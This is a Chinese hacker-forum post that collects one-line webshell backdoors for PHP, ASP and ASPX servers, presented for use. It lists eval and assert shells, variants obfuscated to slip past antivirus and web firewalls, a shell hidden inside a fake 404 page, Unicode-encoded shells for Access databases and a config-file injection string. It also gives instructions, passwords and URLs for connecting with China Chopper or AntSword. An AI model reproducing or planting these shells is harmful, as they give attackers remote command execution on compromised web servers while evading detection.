PHP ASP ASPX一句话木马源代码 WEB

admin 5月前 134

1、普通一句话:

<?php
@eval($_POST[123456]);
?>

*post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码

2、防爆破一句话:

<?php
substr(md5($_REQUEST['x']),28)=='6862'&&eval($_REQUEST['password']);
?>
*菜刀地址http://192.168.64.137/x.php?x=myh0st

3、过狗一句话:

<?php
($_=@$_GET[s]).@$_($_POST[hihack])
?> //菜刀地址 http://localhost/1.php?s=assert
<php $a = "a"."s"."s"."e"."r"."t"; $a($_POST[hihack]);
?>

4、404隐藏的一句话:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /error.php was not found on this server. </p>
</body></html>
<?php
@preg_replace("/[checksql]/e",$_POST['hihack'],"saft");
?>

菜刀连接时在配置栏添加:

<O>date=@eval($_POST[paxmac]);</O>

5、不用问号(?)的一句话:

<script language="php">eval ($_POST[hihack]);</script>

6、躲避检测:

<?php assert($_REQUEST["hihack"]);?>

7、变形一句话后门:

访问该网页,然后菜刀连接:/myh0st.php 密码:hihack

ASP一句话:

1、普通一句话:

<%eval request("hihack")%>或<%execute(request("hihack"))%>

2、unicode编码的access木马 :

向access数据库插入 ┼攠數畣整爠煥敵瑳∨≡┩> 编码前:<% execute request("a")%>

然后备份出webshell,密码a

3、配置文件插马(需要条件支持,插入的数据被写在了配置文件中):

插入:"%><% bbbb=request("aaaa")%><%eval(bbbb)%><%'

访问报错,获取到配置文件的地址,然后连接,密码aaaa

4、不用%的一句话:

<script language=VBScript runat=server>execute request("hihack")</script>

5、不用双引号(“)的一句话:

<%eval request(chr(35))%> 密码:#

ASPX一句话:

1、普通一句话:

<%@ Page Language=”Jscript”%> <%eval(Request.Item[“hihack”],”unsafe”);%>

2、免杀一句话:

<%@PAGE LANGUAGE=JSCRIPT%><%var PAY:String=Request[“x61x62x63x64”];eval(PAY,”x75x6Ex73x61”+”x66x65”);%>

少客联盟- 版权声明 1、本主题所有言论和图片纯属会员个人意见,与少客联盟立场无关。
2、本站所有主题由该帖子作者发表,该帖子作者admin少客联盟享有帖子相关版权。
3、少客联盟管理员和版主有权不事先通知发贴者而删除本文。
4、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者admin少客联盟的同意。
5、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任。
6、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
7、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意。
8、官方反馈邮箱:chinasuc@chinasuc.cn


上一篇:burpsuite绕过验证码
下一篇:使用kali工具识别密文的加密类型
Whatever is worth doing is worth doing well. juvenile hacker league
最新回复 (0)
    • 少客联盟
      2
        登录 注册 QQ登录(停用)
返回